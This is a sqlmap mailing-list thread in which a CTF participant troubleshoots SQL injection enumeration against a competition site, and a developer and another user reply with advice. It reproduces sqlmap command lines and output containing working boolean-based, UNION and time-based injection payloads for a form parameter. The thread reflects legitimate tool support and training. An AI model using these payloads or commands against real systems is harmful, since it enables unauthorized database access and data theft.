Re: [sqlmap-users] I am not finding table names from db names with sqlmap..is there any idea?
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] I am not finding table names from db names with sqlmap..is there any idea?
|
From: Fırat C. E. <fc....@gm...> - 2012-04-27 18:03:02
|
Okay I resolved..:) Thanks a lot Chris and Miroslav...I resolved this problem..:) not sqlmap 1.0 but r4766 not sqlmap 0.9 but r5022 it should be 1.0 and r5022 Thanks so much again:) Best Regards 27 Nisan 2012 20:42 tarihinde Chris Oakley <chr...@gm...>yazdı: > Hi > > Just thought I'd point out that it looks like you're running 0.9 stable > and not the 1.0 latest repository version. > > Regards > > Chris > > > 2012/4/27 Fırat Celal Erdik <fc....@gm...> > >> Hi Miroslav, >> First thanks a lot for your fast reply.. I found this value( *38' OR >> '38'='38 )* from w3af output.you know too,w3af is a vulnerability >> scanner for web application.I get this value from w3af.And I attached a >> w3af screenshot about this vulnerability.This is a boolean-based sql >> injection.. >> >> When I was give this value(*38' OR '38'='38*) to "kelime" parameter >> manually in sqlmap r4766 revision, I had below output for enumurating >> database names. >> >> *root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u >> http://level4.hack2net.com/projects.php --forms --dbs* >> *.....* >> *.....* >> *POST http://level4.hack2net.com:80/projects.php?form=ara* >> *POST data: kelime=&tur=1&aramayap=Ara* >> *do you want to test this form? [Y/n/q] * >> *> y* >> * >> * >> *.....* >> *.....* >> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank >> fields detected): kelime=38' OR '38'='38* >> *.....* >> *.....* >> * >> * >> *web application technology: PHP 5.3.5* >> *back-end DBMS: MySQL 5.0.11* >> *[17:27:54] [INFO] fetching database names* >> *available databases [4]:* >> *[*] ctf2* >> *[*] information_schema* >> *[*] mysql* >> *[*] test* >> >> After this database names enumuration, I give below command for >> enumurating table names but sqlmqp didnt find any table names: >> >> *root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u >> http://level4.hack2net.com/projects.php --forms -D ctf2 --tables* >> *.....* >> *.....* >> *POST http://level4.hack2net.com:80/projects.php?form=ara* >> *POST data: kelime=&tur=1&aramayap=Ara* >> *do you want to test this form? [Y/n/q] * >> *> y* >> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank >> fields detected): kelime=38' OR '38'='38* >> *.....* >> *.....* >> but sqlmap didnt any table names,it passed second form. >> >> I updated to sqlmap r5022 revision now..but I didnt get any database >> names now:) output is below. >> >> *root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u >> http://level4.hack2net.com/projects.php --forms --dbs* >> >> sqlmap/0.9 - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 19:46:09 >> >> [19:46:12] [INFO] testing connection to the target url >> [19:46:21] [INFO] searching for forms >> [19:46:22] [INFO] sqlmap got a total of 2 targets >> [#1] form: >> POST http://level4.hack2net.com:80/projects.php?form=ara >> POST data: kelime=&tur=1&aramayap=Ara >> do you want to test this form? [Y/n/q] >> > y >> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank >> fields detected): kelime=38' OR '38'='38&tur=4&aramayap=Ara* >> [19:47:31] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/ >> level4.hack2net.com/session' as session file >> [19:47:50] [INFO] testing if the url is stable, wait a few seconds >> [19:47:54] [INFO] url is stable >> [19:47:54] [INFO] testing if POST parameter 'tur' is dynamic >> [19:47:59] [INFO] confirming that POST parameter 'tur' is dynamic >> [19:48:00] [INFO] POST parameter 'tur' is dynamic >> [19:48:01] [WARNING] heuristic test shows that POST parameter 'tur' might >> not be injectable >> [19:48:01] [INFO] testing sql injection on POST parameter 'tur' >> [19:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [19:48:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause' >> [19:48:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> [19:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE or HAVING clause' >> [19:48:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING >> clause (XMLType)' >> [19:48:36] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [19:48:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> [19:48:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> [19:48:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [19:48:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> [19:48:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> [19:48:56] [INFO] testing 'Oracle AND time-based blind' >> [19:49:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [19:49:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> [19:49:49] [WARNING] using unescaped version of the test because of zero >> knowledge of the back-end DBMS >> [19:50:51] [WARNING] POST parameter 'tur' is not injectable >> [19:50:51] [INFO] testing if POST parameter 'aramayap' is dynamic >> [19:50:52] [WARNING] POST parameter 'aramayap' is not dynamic >> [19:50:53] [WARNING] heuristic test shows that POST parameter 'aramayap' >> might not be injectable >> [19:50:53] [INFO] testing sql injection on POST parameter 'aramayap' >> [19:50:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [19:51:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause' >> [19:51:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> [19:51:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE or HAVING clause' >> [19:51:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING >> clause (XMLType)' >> [19:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [19:51:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> [19:51:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> [19:51:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [19:51:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> [19:51:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> [19:51:56] [INFO] testing 'Oracle AND time-based blind' >> [19:52:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> [19:52:49] [WARNING] using unescaped version of the test because of zero >> knowledge of the back-end DBMS >> [19:53:47] [CRITICAL] connection timed out to the target url or proxy, >> sqlmap is going to retry the request >> [19:54:04] [WARNING] POST parameter 'aramayap' is not injectable >> [19:54:04] [INFO] testing if GET parameter 'form' is dynamic >> [19:54:06] [WARNING] GET parameter 'form' is not dynamic >> [19:54:07] [WARNING] heuristic test shows that GET parameter 'form' might >> not be injectable >> [19:54:07] [INFO] testing sql injection on GET parameter 'form' >> [19:54:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [19:54:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause' >> [19:54:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> [19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE or HAVING clause' >> [19:55:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING >> clause (XMLType)' >> [19:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [19:55:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> [19:55:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> [19:55:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [19:55:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> [19:55:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> [19:55:39] [INFO] testing 'Oracle AND time-based blind' >> [19:55:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [19:57:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> [19:57:05] [WARNING] using unescaped version of the test because of zero >> knowledge of the back-end DBMS >> [19:57:53] [WARNING] GET parameter 'form' is not injectable >> [19:57:54] [ERROR] all parameters are not injectable, try to increase >> --level/--risk values to perform more tests. Rerun without providing the >> --technique switch. Give it a go with the --text-only switch if the target >> page has a low percentage of textual content (~22.06% of page content is >> text), skipping to the next form >> [#2] form: >> POST http://level4.hack2net.com:80/projects.php >> POST data: Ara=Ara >> do you want to test this form? [Y/n/q] >> > n >> >> [*] shutting down at: 20:04:22 >> >> And then I passed with enter without editing post data in this command. >> output is below.(in revision r5022) >> >> *root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u >> http://level4.hack2net.com/projects.php --forms --dbs* >> >> sqlmap/0.9 - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 20:04:31 >> >> [20:04:32] [INFO] testing connection to the target url >> [20:04:39] [INFO] searching for forms >> [20:04:40] [INFO] sqlmap got a total of 2 targets >> [#1] form: >> POST http://level4.hack2net.com:80/projects.php?form=ara >> POST data: kelime=&tur=1&aramayap=Ara >> do you want to test this form? [Y/n/q] >> > y >> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank >> fields detected): * >> do you want to fill blank fields with random values? [Y/n] y >> [20:04:46] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/ >> level4.hack2net.com/session' as session file >> [20:04:48] [INFO] testing if the url is stable, wait a few seconds >> [20:04:50] [INFO] url is stable >> [20:04:50] [INFO] testing if POST parameter 'kelime' is dynamic >> [20:04:52] [WARNING] POST parameter 'kelime' is not dynamic >> [20:04:54] [WARNING] heuristic test shows that POST parameter 'kelime' >> might not be injectable >> [20:04:54] [INFO] testing sql injection on POST parameter 'kelime' >> [20:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [20:05:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause' >> [20:05:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> [20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE or HAVING clause' >> [20:05:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING >> clause (XMLType)' >> [20:05:33] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [20:05:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> [20:05:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> [20:05:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [20:05:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> [20:06:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> [20:06:05] [INFO] testing 'Oracle AND time-based blind' >> [20:06:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [20:06:21] [CRITICAL] unable to connect to the target url or proxy, >> sqlmap is going to retry the request >> [20:07:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> [20:07:15] [WARNING] using unescaped version of the test because of zero >> knowledge of the back-end DBMS >> *[20:08:07] [WARNING] POST parameter 'kelime' is not injectable* >> >> sqlmap said, kelime parameter is not vulnerable :) why ?? I know this >> parameter vulnerable..because other competitors in CTF exploited this >> vulnerability and got all data in database :) w3af outputs says this >> parameter vulnerable >> >> How can I find rihgt vulnerable point in http://level4.hack2net.com/ and >> exploit it successful.If you have any time and help me about this topic, I >> will so happy :) >> >> Thanks a lot again. >> Best Regards >> >> >> 27 Nisan 2012 16:17 tarihinde Miroslav Stampar < >> mir...@gm...> yazdı: >> >> Hi Firat. >>> >>> First of all please always keep your sqlmap up to date. Current revision >>> is r5022 and you are running r4766. >>> >>> Second, could you please explain how did you get "*OR '38'='38'"*inside those payloads. We already have mechanisms to prevent this kind of >>> "user behavior" but you've obviously circumvented that somehow (--prefix or >>> maybe you've entered that one manually inside form search prompts). Thing >>> is that OR A=A is never a smart thing to do inside a SQL injection tool(s). >>> That's simply because OR 1=1 always results in TRUE potentially screwing >>> user with false results. >>> >>> Third, it would be great if you could send database names you've >>> retrieved. It's quite possible that there are some permission problems you >>> are experiencing around system "mysql" database. Also, you are maybe >>> experiencing permission problems when accessing "information_schema" >>> database for retrieving identifier names. >>> >>> Kind regards, >>> Miroslav Stampar >>> >>> 2012/4/27 Fırat Celal Erdik <fc....@gm...> >>> >>>> Hi, >>>> is there anybody help me about a mysql boolean based sql injection >>>> exploitation with sqlmap..I found database names with sqlmap but I didnt >>>> find any tables from any database..I dont want to use for finding table >>>> names from a common table names file.. So, how can I take full table names >>>> with sqlmap or another tool..I tried havij but I can not find any table >>>> name with it ..is there any idea ? >>>> >>>> I had this error on sqlmap : >>>> >>>> *./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D >>>> mysql --tables* >>>> * >>>> * >>>> * sqlmap/1.0-dev (r4766) - automatic SQL injection and database >>>> takeover tool* >>>> * http://www.sqlmap.org* >>>> * >>>> * >>>> *[!] legal disclaimer: usage of sqlmap for attacking targets without >>>> prior mutual consent is illegal. It is the end user's responsibility to >>>> obey all applicable local, state and federal laws. Authors assume no >>>> liability and are not responsible for any misuse or damage caused by this >>>> program* >>>> * >>>> * >>>> *[*] starting at 15:01:42* >>>> * >>>> * >>>> *[15:01:42] [INFO] testing connection to the target url* >>>> *[15:01:43] [INFO] searching for forms* >>>> *[15:01:43] [INFO] sqlmap got a total of 2 targets* >>>> *[#1] form:* >>>> *POST http://level4.hack2net.com:80/projects.php?form=ara* >>>> *POST data: kelime=&tur=1&aramayap=Ara* >>>> *do you want to test this form? [Y/n/q] * >>>> *> y* >>>> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank >>>> fields detected): * >>>> *do you want to fill blank fields with random values? [Y/n] y* >>>> *[15:01:50] [INFO] using '/pentest/database/sqlmap/output/ >>>> level4.hack2net.com/session' as session file* >>>> *[15:01:50] [INFO] resuming injection data from session file* >>>> *[15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session >>>> file* >>>> *[15:01:50] [INFO] using >>>> '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results >>>> file* >>>> *sqlmap identified the following injection points with a total of 0 >>>> HTTP(s) requests:* >>>> *---* >>>> *Place: POST* >>>> *Parameter: kelime* >>>> * Type: boolean-based blind* >>>> * Title: AND boolean-based blind - WHERE or HAVING clause* >>>> * Payload: kelime=38' OR '38'='38' AND 5116=5116 AND >>>> 'Hbnf'='Hbnf&tur=4&aramayap=Ara* >>>> * >>>> * >>>> * Type: UNION query* >>>> * Title: MySQL UNION query (NULL) - 5 columns* >>>> * Payload: kelime=38' OR '38'='38' UNION ALL SELECT >>>> CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL, >>>> NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara* >>>> * >>>> * >>>> * Type: AND/OR time-based blind* >>>> * Title: MySQL > 5.0.11 AND time-based blind* >>>> * Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND >>>> 'mlpI'='mlpI&tur=4&aramayap=Ara* >>>> *---* >>>> * >>>> * >>>> *do you want to exploit this SQL injection? [Y/n] y* >>>> *[15:01:56] [INFO] the back-end DBMS is MySQL* >>>> * >>>> * >>>> *web application technology: PHP 5.3.5* >>>> *back-end DBMS: MySQL 5.0.11* >>>> *[15:01:56] [INFO] fetching tables for database: mysql* >>>> *[15:01:56] [INFO] fetching number of tables for database 'mysql'* >>>> *[15:01:56] [WARNING] running in a single-thread mode. Please consider >>>> usage of option '--threads' for faster data retrieval* >>>> *[15:01:56] [INFO] retrieved: * >>>> *[15:01:58] [WARNING] unable to retrieve the number of tables for >>>> database 'mysql'* >>>> *[15:01:58] [ERROR] unable to retrieve the table names for any database >>>> * >>>> *do you want to use common table existence check? [Y/n/q] * >>>> >>>> Thanks a lot.. >>>> >>>> -- >>>> *Fırat Celal Erdik >>>> Security Specialist, Certified Ethical Hacker - C|EH** >>>> http://www.networkpentest.net* >>>> >>>> >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Live Security Virtual Conference >>>> Exclusive live event will cover all the ways today's security and >>>> threat landscape has changed and how IT managers can respond. >>>> Discussions >>>> will include endpoint security, mobile security and the latest in >>>> malware >>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> >> >> -- >> *Fırat Celal Erdik >> Security Specialist, Certified Ethical Hacker - C|EH** >> http://www.networkpentest.net* >> >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- *Fırat Celal Erdik Security Specialist, Certified Ethical Hacker - C|EH** http://www.networkpentest.net* |
